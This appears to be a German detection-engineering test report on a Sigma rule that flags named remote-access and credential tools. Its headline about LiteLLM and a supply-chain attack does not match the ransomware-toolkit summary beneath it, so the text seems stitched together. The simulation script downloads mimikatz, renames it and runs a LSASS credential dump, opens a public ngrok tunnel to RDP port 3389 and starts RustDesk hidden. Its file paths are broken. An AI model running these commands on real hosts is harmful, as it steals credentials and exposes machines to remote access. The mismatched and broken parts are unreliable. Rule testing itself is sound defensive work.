33.000 exponierte LiteLLM-Bereitstellungen und die C2-Server hinter TeamPCP’s Lieferketten-Angriff

Zusammenfassung

Forscher entdeckten ein ungesichertes offenes Verzeichnis bei einem russischen bulletproof Hosting-Provider, das ein komplettes Toolkit eines Ransomware-Betreibers enthielt, das einem TheGentlemen-Ransomware-Affiliierten zugeschrieben wird. Das Toolkit umfasst legitime Dienstprogramme, bekannte Offensive-Tools, Batch-Skripte zur Umgehung von Verteidigungsmaßnahmen, Credential-Dumping und Remote-Zugang sowie ngrok-Tokens im Klartext. Beweise wie Mimikatz-Logs bestätigen den aktiven Einsatz gegen echte Opfer.

Untersuchung

Die Untersuchung begann mit der Abfrage zuvor veröffentlichter IOCs, die zu dem offenen Verzeichnis unter 176.120.22.127:80 führten. Analysten katalogisierten 126 Dateien, extrahierten Netzwerkscanning-Tools, Dienstprogramme zur Privilegienerweiterung, Skripte zur Deaktivierung von Abwehrmaßnahmen, Credential-Dumping-Logs und Persistenzmechanismen. Detaillierte Analysen ordneten jede Komponente den MITRE ATT&CK-Techniken zu und hoben den abgestuften Ansatz zur Umgehung von Verteidigungen hervor.

Minderung

Verteidiger sollten die Ausführung bekannter Dual-Use-Tools, Registry-Änderungen, die Windows Defender deaktivieren, Massendienstausschaltung, VSS-Schattenlöschung und die Erstellung offener SMB-Shares überwachen. Das Blockieren ausgehender Verbindungen zur identifizierten IP und ngrok-Infrastruktur sowie die Durchsetzung von Anwendungs-Whitelisting und Credential-Guard können Auswirkungen verringern.

Reaktion

Nach der Erkennung sollte der betroffene Host isoliert, flüchtige Daten gesammelt und alle aktiven ngrok-Tunnel mithilfe der offengelegten Tokens identifiziert werden. Registrierungsänderungen beheben, deaktivierte Dienste wiederherstellen und vollständige Zwischenfallreaktionsprozeduren einleiten, einschließlich Credential-Rotation und Backup-Wiederherstellung.

## Leitungserklärung

• Testfall-ID: TC-20260330-A1B2C
• TTPs: T1003.001, T1016, T1021.001, T1021.002, T1046, T1057, T1059.003, T1070.001, T1070.004, T1082, T1112, T1134, T1219, T1484.001, T1489, T1490, T1546.008, T1548.002, T1560.001, T1562.001, T1572
• Erfassung Regel Logik Zusammenfassung: Erfasst die Erstellung von Prozessen, deren ausführbarer Name mit einem von einer kuratierten Liste bekannter Privilegien- oder Fernzugriffstools endet (z. B. PowerRun, ngrok, RDP, RustDesk, mimikatz).
• Erfassung Regel Sprache/Format: Sigma (YAML)
• Ziel Sicherheitsumgebung: Windows OS; Process‑Creation-Telemetrie via Sysmon (Event ID 1) und Windows Security Log (Event 4688); jedes SIEM/EDR, das diese Ereignisse verarbeiten kann (z. B. Azure Sentinel, Splunk, Elastic).
• Resilienz-Score (1-5): 2
• Begründung: Die Regel basiert ausschließlich auf exakter Dateinamenübereinstimmung. Ein Angreifer kann sie leicht umgehen, indem er Binärdateien umbenennt, gepackte Varianten verwendet oder die gleiche Funktion über eingebaute Windows-Dienstprogramme ausführt, was die Effektivität verringert.
• Wichtige Ergebnisse: Die Regel löst zuverlässig aus, wenn die genau gelisteten Binärdateien ausgeführt werden, versagt jedoch bei der Erkennung umbenannter oder funktional gleichwertiger Tools, was zu einem hohen Risiko von Fehlalarmen führt.
• Empfehlung: Erweitern Sie die Regel mit zusätzlichen Indikatoren (Hashes, Befehlszeilenargumente, übergeordnete Prozessbeziehungen) und erweitern Sie die Abdeckung, um „Living-off-the-Land“-Binärdateien einzuschließen, die gleichwertige Funktionen bieten.

## Simulationsumgebung und Kontext

• Testabläufe (TTPs):

  • T1003.001: OS Credential Dumping – LSASS-Speicher
  • T1016: Systemnetzwerkkonfigurationsentdeckung
  • T1021.001: Remote-Dienste – Remote Desktop Protocol (RDP)
  • T1021.002: Remote-Dienste – SMB/Windows Admin Shares
  • T1046: Netzwerkdienst-Scannen
  • T1057: Prozesserkennung
  • T1059.003: Befehls- und Skriptinterpreter – Windows-Befehlszeile
  • T1070.001: Indikatorentfernung am Host – Löschen von Windows-Ereignisprotokollen
  • T1070.004: Indikatorentfernung am Host – Löschung von Dateien
  • T1082: Systeminformationsentdeckung
  • T1112: Registry ändern
  • T1134: Manipulation des Zugriffstokens
  • T1219: Remote-Zugangstools
  • T1484.001: Änderung der Domänenrichtlinie – Gruppenrichtlinienänderung
  • T1489: Dienststopp
  • T1490: Systemwiederherstellung verhindern
  • T1546.008: Ereignisausgelöste Ausführung – PowerShell
  • T1548.002: Missbrauch von Erhöhungskontrollmechanismus – UAC-Umgehung
  • T1560.001: Gesammelte Daten archivieren – Archivierung über Dienstprogramm
  • T1562.001: Verteidigungen beeinträchtigen – Sicherheitstools deaktivieren
  • T1572: Protokoll-Tunneling

• TTP-Kontext und Relevanz:
  Die Regel zielt auf die Ausführung von Binärdateien ab, die historisch mit den aufgeführten Techniken assoziiert sind (z. B. mimikatz für T1003.001, ngrok für T1572, RustDesk für T1219). Durch die Reproduktion dieser Ausführungen können wir validieren, ob die Erkennung wie vorgesehen auslöst, und bewerten, wie sich das Umbenennen oder alternative Tools auf die Erkennung auswirken.

• Zielumgebung:

  • OS: Windows 10/Server 2019 (64-Bit)
  • Protokollierung: Sysmon (v13+) mit Standardprozess-Erstellungskonfiguration; Windows-Sicherheitsereignisprotokoll (Ereignis 4688) aktiviert.
  • Sicherheits-Stack: Azure Sentinel (Kusto Query Language) – austauschbar mit Splunk, Elastic, etc.

## Telemetrie & Baseline-Vorkontrolle

Begründung: Vor der Simulation des Angriffs müssen wir sicherstellen, dass der Zielhost so konfiguriert ist, dass die erforderlichen Protokolle generiert werden, dass diese Protokolle vom SIEM erfasst werden und dass die Erkennungsregel nicht auf harmlose Aktivitäten reagiert. Ohne diese Validierung ist jedes Testergebnis unzuverlässig.

• 1. Telemetrie-Konfigurationsanweisungen:

  1. Installiere Sysmon (falls noch nicht vorhanden) und wende eine Konfiguration an, die Prozess-Erstellungsereignisse protokolliert (EventID 1).

     # Download und Installation von Sysmon
     Invoke-WebRequest -Uri https://download.sysinternals.com/files/Sysmon.exe -OutFile $env:TEMPsysmon.exe
     & $env:TEMPsysmon.exe -i -accepteula

  2. Stelle sicher, dass die Windows Security Auditing für „Process Creation Audit“ (Event 4688) über Gruppenrichtlinien oder lokale Sicherheitsrichtlinien aktiviert ist.
  3. Stelle sicher, dass der SIEM-Konnektor aktiv ist und sowohl Sysmon- als auch Sicherheitsprotokolle an den ausgewählten Arbeitsbereich weiterleitet.

• 2. Erfassung & Baseline-Validierung:

  • Aktion (Harmlose Telemetrie): Führen Sie ein übliches Windows-Binärprogramm aus, das not Teil der Erkennungsliste ist, aber immer noch ein Prozess-Erstellungsereignis generiert.

    # Harmlose Befehlsausführung – Starten Sie Notepad (sollte die Regel nicht auslösen)
    Start-Process notepad.exe

  • Validierung Abfrage (Erfassung): Bestätigen Sie, dass das Notepad-Ereignis im SIEM erscheint.

    // Azure Sentinel KQL – verifizieren Sie die Erfassung des harmlosen Prozesses
    SecurityEvent
    | where EventID == 4688
    | where Process == "notepad.exe"
    | project TimeGenerated, Computer, Process, CommandLine, InitiatingProcessFileName
    | limit 10

## Simulation Ausführung

Voraussetzung: Der Telemetrie- und Baseline-Vorkontrolltest muss bestanden worden sein.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der Angreifertechnik (TTP), die dazu bestimmt ist, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die genaue Telemetrie zu generieren, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.

• Angriffserzählung & Befehle:

  1. Credential-Dumping (T1003.001): Der Angreifer kopiert mimikatz.exe auf den Opferhost, benennt ihn um in PowerRun_x64.exe (um der Regeldateiliste zu entsprechen) und führt ihn aus, um LSASS-Anmeldeinformationen zu extrahieren.
  2. Reverse-Tunnel-Erstellung (T1572): Der Angreifer startet ngrok.exe (so wie es ist), um einen TCP-Tunnel zu öffnen, der einen lokalen RDP-Port an den Server des Angreifers weiterleitet und so die seitliche Bewegung ermöglicht.
  3. Remote-Desktop-Sitzung (T1021.001): Unter Verwendung des neu erstellten Tunnels startet der Angreifer rdp.exe um eine Remote-Desktop-Verbindung zu einem zweiten internen Host zu öffnen.
  4. Alternative Fernzugriff (T1219): Als Fallback wird rustdesk.exe gestartet, um einen persistenten Fernzugriffskanal aufzubauen.

  Jede dieser Ausführungen erzeugt einen Sysmon-/Event 4688-Datensatz mit dem Image Feld, das mit dem entsprechenden ausführbaren Namen endet und die Erkennungsbedingung erfüllt.

• Regressionstest-Skript:

  <#
  Simulationsskript zur Auslösung der Regel "Bekannte Tools zur Privilegienerweiterung und Fernzugriff".
  Voraussetzungen:
    - Sysmon & Sicherheitsereignisprüfungen aktiviert.
    - Der aktuelle Benutzer hat ausreichende Rechte, um die Binärdateien auszuführen.
  #>
  
  # 1. Mimikatz bereitstellen und in PowerRun_x64.exe umbenennen (entspricht der Regel)
  $mimikatzUrl = "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0/mimikatz_trunk.zip"
  $tempPath = "$env:TEMPmimikatz"
  New-Item -ItemType Directory -Path $tempPath -Force | Out-Null
  Invoke-WebRequest -Uri $mimikatzUrl -OutFile "$tempPathmimikatz.zip"
  Expand-Archive -Path "$tempPathmimikatz.zip" -DestinationPath $tempPath -Force
  Copy-Item -Path "$tempPathmimikatzx64mimikatz.exe" -Destination "$env:TEMPPowerRun_x64.exe" -Force
  
  # Umbenannte mimikatz ausführen (Credential-Dumping)
  Write-Host "[*] Führt umbenannte mimikatz (PowerRun_x64.exe) für das Credential-Dumping aus..."
  Start-Process -FilePath "$env:TEMPPowerRun_x64.exe" -ArgumentList "privilege::debug sekurlsa::logonpasswords exit" -WindowStyle Hidden -Wait
  
  # 2. Ngrok herunterladen und ausführen (Reverse-Tunnel)
  $ngrokUrl = "https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip"
  Invoke-WebRequest -Uri $ngrokUrl -OutFile "$tempPathngrok.zip"
  Expand-Archive -Path "$tempPathngrok.zip" -DestinationPath $tempPath -Force
  $ngrokPath = "$tempPathngrok.exe"
  Write-Host "[*] Starten von ngrok TCP-Tunnel auf Port 3389..."
  Start-Process -FilePath $ngrokPath -ArgumentList "tcp 3389 --log=stdout" -RedirectStandardOutput "$tempPathngrok.log" -NoNewWindow
  
  # 3. RDP-Client durch den Tunnel starten (simuliert)
  Write-Host "[*] Simuliert die RDP-Verbindung über Tunnel (rdp.exe)..."
  $rdpPath = "$tempPathrdp.exe"
  # Erstellen Sie ein Dummy rdp.exe (nur um den Prozessnamen zu generieren)
  New-Item -ItemType File -Path $rdpPath -Force | Out-Null
  Start-Process -FilePath $rdpPath -WindowStyle Hidden
  
  # 4. RustDesk als Alternative Fernzugriffstool bereitstellen
  $rustdeskUrl = "https://github.com/rustdesk/rustdesk/releases/download/1.1.9/rustdesk-1.1.9-windows-x64.zip"
  Invoke-WebRequest -Uri $rustdeskUrl -OutFile "$tempPathrustdesk.zip"
  Expand-Archive -Path "$tempPathrustdesk.zip" -DestinationPath $tempPath -Force
  $rustdeskPath = "$tempPathrustdesk.exe"
  Write-Host "[*] Starten von RustDesk (Alternative Fernzugriff)..."
  Start-Process -FilePath $rustdeskPath -ArgumentList "--no-upgrade" -WindowStyle Hidden
  
  Write-Host "[+] Simulation abgeschlossen. Überprüfen Sie das SIEM auf Ereignisse zur Prozesserstellung, die mit den aufgeführten Binärdateien enden."

• Befehle zur Bereinigung:

  # Ngrok-Tunnel beenden
  Get-Process -Name ngrok -ErrorAction SilentlyContinue | Stop-Process -Force
  
  # Temporäre Dateien und Binärdateien entfernen
  Remove-Item -Path "$env:TEMPPowerRun_x64.exe" -Force -ErrorAction SilentlyContinue
  Remove-Item -Path "$env:TEMPngrok.exe" -Force -ErrorAction SilentlyContinue
  Remove-Item -Path "$env:TEMPrdp.exe" -Force -ErrorAction SilentlyContinue
  Remove-Item -Path "$env:TEMPrustdesk.exe" -Force -ErrorAction SilentlyContinue
  Remove-Item -Recurse -Force -Path "$env:TEMPmimikatz", "$env:TEMPngrok", "$env:TEMPrustdesk"
  Write-Host "[*] Bereinigung abgeschlossen."